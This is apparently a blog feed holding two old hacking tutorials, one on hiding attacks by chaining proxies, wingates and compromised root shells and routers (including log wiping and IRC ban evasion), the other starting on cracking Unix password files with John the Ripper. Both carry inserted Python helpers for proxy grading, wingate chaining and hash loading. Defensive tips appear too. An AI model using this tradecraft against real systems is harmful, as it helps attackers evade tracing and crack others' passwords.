/&gt;So what if you are using an exploit to mount an attack and you are too lazy to use wingates to connect to your shell?  
You can use something like rain.forrest.puppy's libwhisker, which makes it extremely easy to add proxy support to perl scripts.  You can get libwhisker at: http://www.wiretrip.net/rfp/bins/libwhisker/pr4/libwhisker.pm   I haven't really looked for a C/C++ version of something like this, since it's just as simple to connect to a shell, but if anyone knows of one please send info to b0iler@hotmail.com &lt;br /&gt;&lt;br /&gt;One last thing I will go over for proxies is chaining them together; hackers use this so they have more cover when hacking into a script available over port 80. To do this you can put proxy1-_-proxy2-_-proxy3-_- before the URL, or you can use a program called MultiProxy to chain anonymous proxies together. What is an anonymous proxy? It is a proxy that will not forward information about you. The main piece of information hackers want to keep secret is their IP address; when a proxy forwards this to a computer it is known as the X-Forwarded-For header. It is a header in the packet which tells the target what computer the proxy is going to send the info to (the hacker's IP). Anonymous proxies will leave the X-Forwarded-For header blank so that the target has no idea where the attack is coming from. You can check if a proxy is anonymous at http://www.cyberarmy.com/cgi/whoami.pl &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bouncing through wingates &lt;br /&gt;Wingates are a type of proxy that allow you to make a telnet connection.  They are intended to allow computers to access the internet through another one, but since many types of wingates allow anyone to connect without a password this can be exploited by hackers and other people to bounce their connection off of.  Here is how this works: &lt;br /&gt;&lt;br /&gt;    [hacker's computer] -&gt; [wingate] -&gt; [destination] &lt;br /&gt;&lt;br /&gt;This snazzy ASCII shows how your data will go through a wingate and then to its destination.  
So the destination sees the data as coming from the wingate.  If you can't see how hackers use this to their advantage, let me explain... &lt;br /&gt;&lt;br /&gt;Hackers want to keep their IP hidden; they don't want the target to know where they are coming from, both so the attack cannot be blocked as easily and so they do not get in trouble if it is noticed.  Using a wingate means the target does not see the hacker's IP, it sees the wingate's IP instead.  Most hackers use more than three wingates when attacking, just to be safe, because if an admin notices the attempt and contacts the admin of the wingate, that wingate's logs can reveal the hacker's IP.  Bouncing off five wingates means a lot more hassle for the attacked admin, and more chances that one hop keeps no logs or has already deleted them. &lt;br /&gt;&lt;br /&gt;Bouncing attacks is not the only reason a hacker would use a wingate.  They are also handy on some IRC servers.  The same basic concept applies: the data is bounced off the wingate and then sent to the IRC server, so the server sees the connection as coming from the wingate.  This lets hackers get around channel bans, get around G-lines, hide themselves from others, create clones, and so on.  Check the options in your IRC client to see how to use them (in mIRC it is under the SOCKS4 firewall options). &lt;br /&gt;&lt;br /&gt;Since they are useful on IRC, many people on IRC are using wingates.  This is why I ported a simple port scanner to irssi (it also works with BitchX and maybe X-Chat).  The scanner is edited to look only at ports 23 and 1080, the most common wingate ports: 23 is telnet, 1080 is SOCKS.  It collects people's IPs as they enter a channel, and when you issue the /scan command it checks that list of IPs for available wingates.  
There are also easy-to-use mIRC scripts that do this; a Google search for "mirc wingate scanner" turns up many links.  You can also scan wide blocks of IPs with dedicated wingate scanners.  Here is a tip: find a cable or DSL ISP and scan its subnet for wingates.  Many people on fast connections run a wingate to share their bandwidth across their home network, and since cable users often have static IPs they do not change as often.  So do a '/whois user' on someone who is on cable to get their IP, then look up their ISP's IP range (the "smartwhois" tool at all-nettols.com does this) and scan that range for wingates. &lt;br /&gt;&lt;br /&gt;Wingates go up and down hourly.  Some people only need them for a while, and when someone does put one up it attracts a lot of traffic from hackers bouncing off it, so rather than waste their bandwidth they secure it or take it down.  Because of this you need to scan for wingates all the time.  That is another reason IRC works well for finding wingates: you let other people find them for you. =) &lt;br /&gt;&lt;br /&gt;Few hackers use just one wingate. This is how using four wingates would work: &lt;br /&gt;&lt;br /&gt;    [hacker's computer] -&gt; [wingate] -&gt; [wingate] -&gt; [wingate] -&gt; [wingate] -&gt; [destination] &lt;br /&gt;&lt;br /&gt;Multiple wingates are a must; a single one would be easy to trace back through.  But too many makes things very slow.  Anything from 4 up to 10 would be normal. &lt;br /&gt;&lt;br /&gt;So after you scan (this may take a while, be patient) and get a few wingates, how do you connect to them and use them? It is very simple, but it gets asked all the time on message boards and in chat rooms.  To telnet to a wingate you need its IP or hostname and the port it is listening on.  Normally the port is 23 or 1080.  
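&lt;br /&gt;&lt;br /&gt;The checks the last two sections describe by hand (is a web proxy leaking your address through X-Forwarded-For, does a candidate on 23 or 1080 actually let you through) as a small script. This is an added example, not code from the original article; the sample requests, the SOCKS4 bytes and the prompt strings are all constructed here, and the transparent/anonymous/elite grading is the usual proxy-list convention rather than something the text defines. &lt;br /&gt;&lt;br /&gt;

```python
"""Proxy and wingate triage (added example; not code from the original article).
Three checks the text describes by hand, on constructed data; nothing touches the network:
  1. what a web server sees behind an HTTP proxy (X-Forwarded-For, Via), used to
     grade a proxy as transparent, anonymous or elite;
  2. the SOCKS4 CONNECT handshake spoken on port 1080, as raw bytes;
  3. the telnet-style prompt that marks an open wingate on port 23, and the lines
     typed at each prompt to chain several of them."""
import struct

CLIENT_IP = "10.1.2.3"   # the address the client would like to hide (constructed)
# Constructed requests as they would arrive at the target through three kinds of proxy.
SAMPLE_TRANSPARENT = ("GET /cgi/whoami.pl HTTP/1.1\r\nHost: target\r\n"
                      "X-Forwarded-For: 10.1.2.3\r\nVia: 1.1 proxy.com\r\n\r\n")
SAMPLE_ANONYMOUS = "GET /cgi/whoami.pl HTTP/1.1\r\nHost: target\r\nVia: 1.1 proxy.com\r\n\r\n"
SAMPLE_ELITE = "GET /cgi/whoami.pl HTTP/1.1\r\nHost: target\r\n\r\n"


def parse_headers(raw_request):
    """Header dict (lower-cased names) from a raw HTTP request; stops at the blank line."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:
        if line == "":
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def grade_proxy(raw_request, client_ip):
    """'transparent' if the client's IP was forwarded, 'anonymous' if the proxy hides
    the IP but still announces itself, 'elite' if the request looks direct."""
    headers = parse_headers(raw_request)
    leaked = " ".join(headers.get(h, "") for h in ("x-forwarded-for", "forwarded", "client-ip"))
    if client_ip in leaked:
        return "transparent"
    if "via" in headers or "x-forwarded-for" in headers or "proxy-connection" in headers:
        return "anonymous"
    return "elite"


def socks4_connect_request(dst_ip, dst_port, userid=""):
    """SOCKS4 CONNECT: VN=4, CD=1, 16-bit port, 4-byte IPv4, userid, NUL terminator."""
    octets = bytes(int(o) for o in dst_ip.split("."))
    return struct.pack("!BBH", 4, 1, dst_port) + octets + userid.encode() + b"\x00"


def socks4_reply_granted(reply):
    """True if the 8-byte SOCKS4 reply has VN=0 and CD=90 (request granted)."""
    if len(reply) >= 8:
        return reply[0] == 0 and reply[1] == 90
    return False


OPEN_PROMPTS = ("wingate>", "proxy server>", "server 1.03>")   # prompts quoted in the text


def looks_like_open_wingate(banner):
    """An open wingate drops you straight at a prompt that takes 'host port';
    anything asking for a login or password is not usable without credentials."""
    text = banner.strip().lower()
    if "login" in text or "password" in text or "username" in text:
        return False
    return text.endswith(">") or any(p in text for p in OPEN_PROMPTS)


def wingate_chain_commands(hops, final_host, final_port):
    """Given the hops [(host, port), ...], the first of which you telnet into yourself,
    return the line to type at each successive prompt so the last hop reaches the target."""
    targets = hops[1:] + [(final_host, final_port)]
    return ["%s %d" % (host, port) for host, port in targets]
```

&lt;br /&gt;&lt;br /&gt;On the defending side the same grade_proxy logic, run on a live request, is the reason X-Forwarded-For must never be trusted as the client address: a chained or anonymous proxy simply leaves it out, and an attacker can set it to anything. &lt;br /&gt;&lt;br /&gt;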
We can only use wingates that do not require a username and password, so after we get a list we need to test which ones work without a login.  Simply open telnet, connect to that IP and port, wait for the connection and see if you get something like this: &lt;br /&gt;&lt;br /&gt;    Wingate&gt; &lt;br /&gt;&lt;br /&gt;If it asks for a login of some sort then you cannot use it.  This is one way wingate admins can protect themselves: password-protect the wingate so random hackers cannot use it.  It is not only hackers who use open wingates; spammers use them as well, and having spammers push thousands of e-mails through your wingate is a sure way to get your ISP to cancel your account.  Besides adding passwords you can also secure your wingate by only allowing computers on your LAN to use it.  For GateKeeper: &lt;br /&gt;&lt;br /&gt;log in as Administrator on GateKeeper &lt;br /&gt;Policies -&gt; Default Policies -&gt; Users can access services -&gt; select everyone &lt;br /&gt;Location -&gt; Specify locations from where this recipient has rights -&gt; &lt;br /&gt;add 127.0.0.1 and 192.168.0.* (or whatever IP range your network uses). &lt;br /&gt;&lt;br /&gt;To secure Deerfield's WinGate simply upgrade to the 3.x home version, which by default does not let outside hosts connect. It is now configured securely out of the box :D &lt;br /&gt;&lt;br /&gt;Other prompts will appear too; it is not always "Wingate&gt;".  It could be anything; Wingate&gt; is just the default on some. &lt;br /&gt;&lt;br /&gt;We are connected, now to use the wingate.  Wingates by default will telnet to any ip:port you enter, so try a server you know is up: &lt;br /&gt;&lt;br /&gt;    Wingate&gt; 204.42.253.18:23 &lt;br /&gt;&lt;br /&gt;If you get an error, either something is wrong with the ip:port you entered, the ip:port is down, or the wingate is not working.  
Also try 'telnet ip:port', since that wingate might not telnet by default.  So we have cut our list of wingates down to the ones that work without a password.  Now to link them.  Say we have these wingates (note: these are made up): &lt;br /&gt;&lt;br /&gt;    203.43.25.104 port 23 &lt;br /&gt;    214.133.200.20 port 1080 &lt;br /&gt;    180.23.56.93 port 23 &lt;br /&gt;    194.51.107.68 port 23 &lt;br /&gt;&lt;br /&gt;To link these we telnet into the first one: &lt;br /&gt;&lt;br /&gt;    telnet 203.43.25.104 23 &lt;br /&gt;    Sparky's server 1.03&gt; &lt;br /&gt;&lt;br /&gt;Then enter the ip:port of the next one on the list. &lt;br /&gt;&lt;br /&gt;    Sparky's server 1.03&gt; 214.133.200.20 1080 &lt;br /&gt;    CDD Proxy Server&gt; &lt;br /&gt;&lt;br /&gt;and link the rest.. &lt;br /&gt;&lt;br /&gt;    CDD Proxy Server&gt; 180.23.56.93 23 &lt;br /&gt;    welcome to 180.23.56.93: 194.51.107.68 23 &lt;br /&gt;&lt;br /&gt;Now a hacker can telnet into a shell account from the last wingate and launch the attack, or, with some socket programming, make the exploits go through the wingates themselves.  In the next section, shells, I'll go over how a hacker uses a shell to make the attack. &lt;br /&gt;&lt;br /&gt;I have heard from a few people that routers can be used as wingates.  I have never done this myself, since there are always plenty of wingates if you just scan for them, but using a router as a wingate is interesting for a number of reasons.  First, a router carries so much traffic that the admin would probably not notice it being used to bounce an attack.  Routers do not log connections by default, and because of the volume not many admins log everything (or their logs do not last long), so there is less chance of the hacker being tracked down.  
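&lt;br /&gt;&lt;br /&gt;What the trace looks like from the admin's side: the chain above can be walked backwards only as long as every hop still has a log line for the connection, and it stops dead at the first hop that kept none, which is the whole reason for stacking hops and preferring ones that do not log. This is an added example, not code from the original article; the log lines and their "TIME connect from SRC:PORT to DST:PORT" format are constructed for it, the four hop addresses are the made-up ones from the text, and the 30-second correlation window is an assumption. &lt;br /&gt;&lt;br /&gt;

```python
"""Tracing a bounced connection back through per-hop connection logs (added example;
not code from the original article). Each hop's admin keeps a log; the walk back from
the target succeeds only while every hop still has its line. Log lines are constructed,
in an assumed format: "TIME connect from SRC:PORT to DST:PORT"."""
import re
from datetime import datetime, timedelta

# Constructed logs keyed by the host that wrote them. The four hops are the made-up
# wingate addresses from the text; 10.0.0.5 is the attacked machine.
LOGS = {
    "10.0.0.5":       ["2001-05-02 03:14:09 connect from 194.51.107.68:4412 to 10.0.0.5:23"],
    "194.51.107.68":  ["2001-05-02 03:10:00 connect from 192.0.2.9:1111 to 194.51.107.68:23",
                       "2001-05-02 03:14:08 connect from 180.23.56.93:3021 to 194.51.107.68:23"],
    "180.23.56.93":   ["2001-05-02 03:14:07 connect from 214.133.200.20:2210 to 180.23.56.93:23"],
    "214.133.200.20": ["2001-05-02 03:14:06 connect from 203.43.25.104:1502 to 214.133.200.20:1080"],
    "203.43.25.104":  ["2001-05-02 03:14:05 connect from 198.51.100.7:1031 to 203.43.25.104:23"],
}
ATTACK_TIME = datetime(2001, 5, 2, 3, 14, 10)   # when the target's admin noticed (constructed)

LINE_RE = re.compile(r"^(\S+ \S+) connect from (\S+):(\d+) to (\S+):(\d+)$")


def parse_line(line):
    """Parse one log line of the assumed format into a dict; raise on anything else."""
    m = LINE_RE.match(line)
    if m is None:
        raise ValueError("unparseable log line: " + line)
    return {"time": datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
            "src": m.group(2), "dst": m.group(4), "dport": int(m.group(5))}


def trace_back(logs, target, when, window=timedelta(seconds=30)):
    """Walk the chain backwards from `target`, attacked at time `when`. At each hop take
    the latest inbound connection within `window` before the outbound one being chased.
    Returns (chain, status): the addresses found so far and why the walk stopped."""
    chain = [target]
    host, deadline = target, when
    while True:
        if host not in logs:
            # Either the attacker's real machine or a hop that kept no logs; the
            # admin cannot tell which from here.
            return chain, "no logs available for " + host
        entries = [parse_line(l) for l in logs[host]]
        inbound = [e for e in entries
                   if e["dst"] == host
                   and e["time"] >= deadline - window
                   and not e["time"] > deadline]
        if not inbound:
            return chain, "no matching inbound connection on " + host
        prev = max(inbound, key=lambda e: e["time"])
        chain.append(prev["src"])
        host, deadline = prev["src"], prev["time"]
```

&lt;br /&gt;&lt;br /&gt;With all five logs present the walk ends at 198.51.100.7 with "no logs available", which is as far as the admin can get without that host's cooperation. Drop the 180.23.56.93 log (a router that does not log, or a wingate admin who already rotated it) and the walk ends there instead, two hops short. &lt;br /&gt;&lt;br /&gt;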
Routers are almost always up and have fast connections, so with a few routers acting as wingates you would not have to scan for new ones as often =) &lt;br /&gt;&lt;br /&gt;Don't go looking for routers just yet: before you can use a router as a wingate you need to be able to telnet from it.  Unlike wingates, which sometimes let anyone use telnet, routers do not, so you would need to break into the router first.  From my experience the number of routers with default passwords (admin:admin) or unpatched, simple exploits is pretty high.  Also note: it is not a good idea to telnet directly into a router as your first hop; if the admin does notice the break-in (and they log), you will have left your real IP.  Hackers will typically go through a regular wingate or two before connecting to a compromised router.  Needless to say, if you admin a router keep it locked down tight: not only can hackers wreck your network, sniff passwords, redirect data and generally make a mess, they can also use your router as a launching pad for their next attack. &lt;br /&gt;&lt;br /&gt;Another use for wingates is to bounce a connection to IRC.  Most commonly SOCKS proxies (SOCKS is short for SOCKetS) are used for IRC; they are very similar to wingates but are mainly used at a firewall to allow transparent connections through it.  SOCKS usually runs on port 1080.  To bounce your connection to an IRC server through a telnet-style wingate, type the following in your IRC client: &lt;br /&gt;&lt;br /&gt;/server win.gate.com 23 &lt;br /&gt;/quote irc.box.sk 6667 &lt;br /&gt;/quote user grendelsucks 123.123.123.123 b0iler :ban evader &lt;br /&gt;/quote nick b0iler2 &lt;br /&gt;&lt;br /&gt;then use IRC as normal; you will show up with the IP or hostname of the wingate.  (This /quote trick only works with wingates that take a plain "host port" line at a prompt; a real SOCKS proxy expects a binary handshake, so for those use the client's SOCKS/firewall setting described next.)  
I believe in mIRC you go to File -&gt; Options -&gt; Connect -&gt; Firewall, enter the wingate's IP and port and check "Use SOCKS Firewall" (correct me if I am wrong).   In X-Chat try Settings -&gt; Setup -&gt; IRC -&gt; Proxy Server, fill in the IP and port and select the type as wingate.  You can also use a BNC (short for BouNCe) to relay your connection to an IRC server. &lt;br /&gt;&lt;br /&gt;As with proxies, if you don't want strangers connecting to your wingate, set up a strict access list on a firewall.  Usernames and passwords are also a good idea on wingates. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Shell Accounts &lt;br /&gt;A shell account is access to a remote computer.  Users connect to it and issue commands just as if they were at that computer's keyboard.  That also means hackers can issue commands, and they often use shell accounts as yet another hop to bounce their attack through. &lt;br /&gt;&lt;br /&gt;Usually a shell account is used together with wingates, and the attack itself is launched from the shell.  Hackers will not use free shells such as nether.net or hobbiton.org because those do not let them run the programs they need, and a regular user account cannot delete the log files.  If they used one of those shells the admin could easily check the logs and see what they were up to.  So hackers use what are known as root shells: systems the hacker has already compromised and has root on.  That lets them delete all the necessary logs of their attack and gives them full access to *nix tools.  The key tools are raw packet support, nmap and other auditing programs, a C compiler, a Perl interpreter and exploits.  These come standard on most *nix boxes, which is what makes *nix so valuable to hackers.  
Although most hackers have *nix installed on their own computer, they still use shells because the shells have faster connections and add another layer of protection on top of the wingates. &lt;br /&gt;&lt;br /&gt;This is an example of how a hacker would use three wingates with two shells: &lt;br /&gt;&lt;br /&gt;    [hacker's computer] -&gt; [wingate] -&gt; [wingate] -&gt; [wingate] -&gt; [shell] -&gt; [shell] -&gt; [target] &lt;br /&gt;&lt;br /&gt;To log in to the shells a hacker can use telnet or ssh, whichever they want; ssh gives an encrypted connection, which also stops the wingate operators in between from reading the session.  A simple telnet owned.com 5742 would get them in (if they set up telnetd on port 5742).  With ssh it is: ssh owned.com -p 5742. If your system were compromised it too could be used as a shell for the hacker's next attack. &lt;br /&gt;&lt;br /&gt;There are free shell accounts for beginner hackers to use, but again, these are closely monitored and you only get a user account, so everything is logged and your power is limited. Don't use them to hack! What a hacker wants is a 'rootshell', meaning root access, which gives total control over everything on that computer. Raw sockets are a big thing; the ability to edit logs is another. If you can edit the logs on a rootshell it is that much harder for anyone to track you. On a free shell or a plain user account you cannot edit the logs and you are open to being traced. Always using a lot of wingates will help keep you out of trouble. &lt;br /&gt;&lt;br /&gt;Most of the shells you will want are on *nix boxes, so you need to learn Unix commands. Knowing what files do what will also help you understand how to hide yourself and how to modify the system the way you want. 
Setting up Linux and securing your own box will help you understand how to break in, and breaking into Linux will help you understand how to secure it =) To help you learn *nix, here are a few really good tutorials: &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://unixhelp.ed.ac.uk - A very easy and detailed step-by-step guide to getting started with Unix, with examples, solutions to problems, and some cool facts. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.mines.utah.edu/~wmgg/ - A short and sweet Unix tutorial to help with the basic commands. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.belgarath.demon.co.uk/guide/ - A very nice guide that takes things slowly and uses helpful pictures to explain things. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.linuxnewbie.org - A very helpful stop for anyone new to Linux; it has many helpful files. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Here's a good one &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And another &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;More free knowledge &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;read one of these! &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Unix links &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;How can you stop hackers from using your system? That is a very in-depth question, because you need to secure the whole box to keep them from getting in at all.  Read up on Unix security, firewalls and IDS.  Of course, act before the hacker gets in: secure your box, and run Tripwire and Snort 'just in case'.  One way to catch them is a remote logging box. A hacker with root can wipe the local logs, but not the copies already sent to another machine, so you keep a record of everything they do. To set it up, take any old box running syslogd started so that it accepts messages from the network (on Linux sysklogd that is the -r switch), firewall its UDP port 514 so only your own servers can reach it, and then change syslog's configuration file on each server to send its logs there: 
&lt;br /&gt;&lt;br /&gt;# /etc/syslog.conf file &lt;br /&gt;*.*                             @213.165.52.61 &lt;br /&gt;&lt;br /&gt;Note that classic syslog forwarding is plain UDP with no authentication, so anyone who can reach port 514 on the logger can spoof or flood entries; keep that port firewalled and the logger itself off-limits.  For more info on setting up a secure remote logger try loki's guide on How to set up a secure remote logger &lt;br /&gt;&lt;br /&gt;One thing I want to stress about using shells on a friend's box: they may be logging everything you do and collecting your usernames and passwords for your e-mail, hacked accounts, sites, FTP, NickServ and anything else you send through.  The same holds true for BNCs and wingates.  It is a trick passed around by many hackers: put a wingate on your box, get it onto a hacker website's proxy list, and wait for people to log into their hacked accounts through it.  I also read somewhere that governments set up wingates to catch hackers. I don't know how true that is, but it sure would be a good way to discourage them. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Conclusion &lt;br /&gt;In this issue of Hacking Techniques I went over how and why hackers use proxies, wingates and shells when attacking, and how admins can stop them from using their networks to bounce attacks from.  I think the next issue will be much longer; it will cover many of the things hackers do once they compromise a system.  I hope everyone learned at least something from this paper, and I hope I didn't forget anything =)  I am sorry if you found this tutorial hard to read; I had a hard time writing it, it just felt like my words didn't go together right. 
It may be a while until I get around to finishing issue #3, thanks for your patience.</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/7073355113603413578/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=7073355113603413578' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7073355113603413578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7073355113603413578'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/hacking-techniques-issue-2-bouncing.html' title='Hacking Techniques: Issue #2 - Bouncing Attacks'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-6229139594027077134</id><published>2007-12-02T01:25:00.001-08:00</published><updated>2007-12-02T01:25:27.321-08:00</updated><title type='text'>Cracking unix password files</title><content type='html'>1) First thing's first &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I guess you are a newbie at password cracking, like I was, and you have probably started John the Ripper full of enthusiasm and got... nothing. 
So your first thought is 'my god this must be hard, and I'm a newbie'. Forget it!!! You are always a newbie, we all are... in the password cracking world, pardon, password recovering world (or any other world) you always have something to learn. Sometimes, even if you are experienced at password cracking, you will not be able to crack a password, even your own. This is a purely technical manual and will only give you the recipe for cracking; every password needs a different approach... &lt;br /&gt;&lt;br /&gt;OK, a good way to get somewhere is to start getting somewhere... &lt;br /&gt;What you are about to learn is to crack *nix (Unix/Linux/etc.) password files. That does not mean you need a Unix distribution on your box, but it does mean you will have to stop clicking your ass off all around the screen... 'What is this fool trying to say', you will probably ask... This fool is trying to say that John is a command-line program (there is a DOS build as well as the Linux/Unix version, and I guess most people reading this have Windows boxes). I will try to teach this through examples so it doesn't read like a boring list of switches. After reading this text it would not be a bad idea to look at the documents that come with John. I learned it all from there, but that was the hard way, and you want the easy way, right? Right. &lt;br /&gt;&lt;br /&gt;First, it would not be a bad idea to get yourself John the Ripper, I guess... if you don't have it you can find it at: &lt;br /&gt;&lt;br /&gt;1) packetstorm.securify.com (look at archives, password cracking) &lt;br /&gt;2) neworder.box.sk (do some searching by yourself) &lt;br /&gt;&lt;br /&gt;John can be found practically anywhere. For example: go to altavista.com and run a search for 'john the ripper'. &lt;br /&gt;&lt;br /&gt;The second thing you'll need is... a HUUUUGE collection of password dictionaries (I'll explain what these are in a minute). 
The best dictionary around is at www.theargon.com and packetstorm (look in the archives); it is called theargonlistserver1 and is about 20 MB packed and over 200 MB &lt;br /&gt;unpacked... get it!!!! The people at theargon did a terrific job. &lt;br /&gt;&lt;br /&gt;You should also get some smaller dictionary files (I'll explain why later). &lt;br /&gt;&lt;br /&gt;2) Do we look like *nix? &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So now you have John, loaded with that huuuuge password dictionary, and you think you can crack anything... If you plan to live for 100000 years that wouldn't be a problem, but you only have some 80 years left in the best case (unless, of course, scientists find a way to... oh, never mind). &lt;br /&gt;&lt;br /&gt;Now, the first thing is to make sure your password file really looks like a Unix password file (we are talking about the /etc/passwd file, or /etc/shadow on systems that keep the hashes there). &lt;br /&gt;&lt;br /&gt;Let's see what Unix password files look like: &lt;br /&gt;&lt;br /&gt;owner:Ejrt3EJUnh5Ms:510:102:Some free text:/home/subdir/owner:/bin/bash &lt;br /&gt;&lt;br /&gt;The important parts are the username and the hashed password, which are the first and second fields (each line is divided into seven fields by the : symbol): &lt;br /&gt;&lt;br /&gt;owner:Ejrt3EJUnh5Ms &lt;br /&gt;&lt;br /&gt;Owner is the username and 'that other thing' is the password hash, produced by the traditional crypt(3) scheme, a salted and modified DES; its first two characters, Ej, are the salt. For the rest of the line you can put anything that looks right, but the structure must be the same so that John recognizes it as a Unix password entry. In fact the other part &lt;br /&gt;&lt;br /&gt;:510:102:Some free text:/home/subdir/owner:/bin/bash &lt;br /&gt;&lt;br /&gt;is just information about the user: UID, GID, comment field, home directory and login shell. 
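&lt;br /&gt;&lt;br /&gt;Loading such a file the way a cracker does, as an added example that is not code from the original article: it parses full seven-field lines, pads the bare user:hash pairs that web-board password files give you, and classifies each hash by its prefix (roughly the format detection John does before choosing a -format). The sample lines are constructed, the $1$ entry's salt and digest are placeholders, and the filler fields are the ones the text uses. &lt;br /&gt;&lt;br /&gt;

```python
"""Loading Unix password entries the way a cracker does (added example; not code from
the original article). Handles full seven-field /etc/passwd lines, bare user:hash pairs
from web-board password files, and detects the hash scheme from its prefix. Entries
are constructed; the $1$ line carries placeholder salt and digest."""

FIELDS = ("user", "hash", "uid", "gid", "gecos", "home", "shell")
FILLER = ("510", "102", "His name", "/home/subdir/owner", "/bin/bash")   # padding used in the text
CRYPT_ALPHABET = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

SAMPLE_LINES = [
    "owner:Ejrt3EJUnh5Ms:510:102:Some free text:/home/subdir/owner:/bin/bash",
    "webuser:Ejrt3EJUnh5Ms",
    "root:x:0:0:root:/root:/bin/bash",
    "alice:$1$saltsalt$hashhashhashhashhashha:1001:1001::/home/alice:/bin/sh",
    "daemon:*:2:2:daemon:/sbin:/sbin/nologin",
]


def parse_passwd_line(line):
    """Seven named fields; a bare user:hash pair is padded with FILLER, since only the
    first two fields matter to the cracker (the text's owner:...:a:a:a:a:a works the same)."""
    parts = line.rstrip("\n").split(":")
    if len(parts) == 2:
        parts = parts + list(FILLER)
    if len(parts) != 7:
        raise ValueError("expected 2 or 7 colon-separated fields, got %d" % len(parts))
    return dict(zip(FIELDS, parts))


def hash_scheme(h):
    """(scheme, salt, crackable) from the hash's prefix and shape."""
    if h in ("", "*", "!", "!!", "x"):
        return ("none-or-shadowed", "", False)       # 'x' means the hash lives in /etc/shadow
    if h.startswith("$1$"):
        return ("md5-crypt", h.split("$")[2], True)
    if h.startswith("$2a$") or h.startswith("$2b$") or h.startswith("$2y$"):
        return ("bcrypt", h[7:29], True)            # after "$2x$NN$": a 22-char salt
    if h.startswith("$5$") or h.startswith("$6$"):
        parts = h.split("$")
        salt = parts[3] if parts[2].startswith("rounds=") else parts[2]
        return ("sha-crypt", salt, True)
    if len(h) == 13 and all(c in CRYPT_ALPHABET for c in h):
        return ("des-crypt", h[:2], True)           # traditional crypt(3): 2-char salt
    return ("unknown", "", False)


def load_crackable(lines):
    """Parse lines, drop entries with nothing to crack, and group the rest by scheme,
    because John works on one ciphertext format per run."""
    groups = {}
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        entry = parse_passwd_line(line)
        scheme, salt, crackable = hash_scheme(entry["hash"])
        if crackable:
            groups.setdefault(scheme, []).append((entry["user"], entry["hash"], salt))
    return groups
```

&lt;br /&gt;&lt;br /&gt;Run on the sample, root and daemon drop out (nothing to crack in the passwd file itself), owner and webuser land in the des-crypt group sharing the salt Ej, and alice goes into a separate md5-crypt group that needs its own John run. &lt;br /&gt;&lt;br /&gt;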
&lt;br /&gt;&lt;br /&gt;Sometimes you will have entries with only the first and second parts, such as password files taken from a web board running Matt's web board script: &lt;br /&gt;&lt;br /&gt;owner:Ejrt3EJUnh5Ms &lt;br /&gt;&lt;br /&gt;You have to add the other part so that the entry looks like a Unix password line. You can copy-paste it from another entry, even &lt;br /&gt;&lt;br /&gt;:510:102:His name:/home/subdir/owner:/bin/bash &lt;br /&gt;&lt;br /&gt;What you have now should look like: &lt;br /&gt;&lt;br /&gt;owner:Ejrt3EJUnh5Ms:510:102:His name:/home/subdir/owner:/bin/bash &lt;br /&gt;&lt;br /&gt;Hell, you can even put &lt;br /&gt;&lt;br /&gt;owner:Ejrt3EJUnh5Ms:a:a:a:a:a &lt;br /&gt;&lt;br /&gt;It won't matter to John at all. &lt;br /&gt;&lt;br /&gt;3) We're getting somewhere... nowhere &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now you're ready to crack. Type in &lt;br /&gt;&lt;br /&gt;john -w:words.lst password.file &lt;br /&gt;&lt;br /&gt;where words.lst is the password dictionary and password.file is the file holding your password hash or hashes (newer John releases also write this as --wordlist=words.lst). If you try it on the example I gave you, you will probably get the password, because it is a really weak one. You would be surprised how often people use really weak passwords such as their name, their pet's name or even their username (for example: username=zalabuk, password=zalabuk). &lt;br /&gt;&lt;br /&gt;Hint: Don't be stupid! Use strong passwords like &lt;br /&gt;&lt;br /&gt;p4sswr!@ &lt;br /&gt;p@s$w11s &lt;br /&gt;with as many characters as you can remember. Use special characters and numbers; such passwords are much harder to crack (I'll explain why in a minute). &lt;br /&gt;The other hint is to use passwords as long as you can remember; 8 characters are sometimes not enough... it depends what kind of box the cracker has... on a dual Alpha it is certainly not enough... in other words... 
